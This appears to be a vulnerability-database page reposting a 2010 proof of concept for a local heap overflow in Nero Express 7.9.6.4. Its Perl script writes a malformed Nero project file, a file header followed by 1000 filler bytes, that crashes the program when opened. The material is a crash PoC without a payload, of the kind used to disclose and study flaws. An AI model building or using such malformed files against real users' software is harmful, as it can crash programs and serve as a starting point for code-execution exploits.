Lucene search
K

Nero Express 7.9.6.4 Heap Overflow

🗓️ 04 Jan 2010 00:00:00Reported by D3V!L FucK3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 22 Views

Nero Express 7.9.6.4 heap overflow in Windows Vist

Code
`#!/user/bin/perl  
# Exploit Title: [Nero Express7 Local Heap Poc]  
# Date: [2010/01/01]  
# Author: [D3V!L FUCKER]  
# Version: [Nero Express7 Ver.7.9.6.4]  
# Tested on: [windows vista sp0]  
#After Setup Open Nero StartSmart Essentials => Favorites => Open Projects => explit.nir  
# Code :  
$headr=  
"\xFF\xFE\xFF\x0E\x4E\x00\x65\x00\x72\x00\x6F\x00\x49\x00\x53\x00".  
"\x4F\x00\x30\x00\x2E\x00\x30\x00\x33\x00\x2E\x00\x30\x00\x31\x00";  
  
$boom="A" x 1000;  
  
open(myfile,'>>exploit.nri') || die "Cannot Creat file\n\n";  
print myfile $headr;  
print myfile $boom;  
print "Done..!~#\n";  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Jan 2010 00:00Current
0.7Low risk
Vulners AI Score0.7
22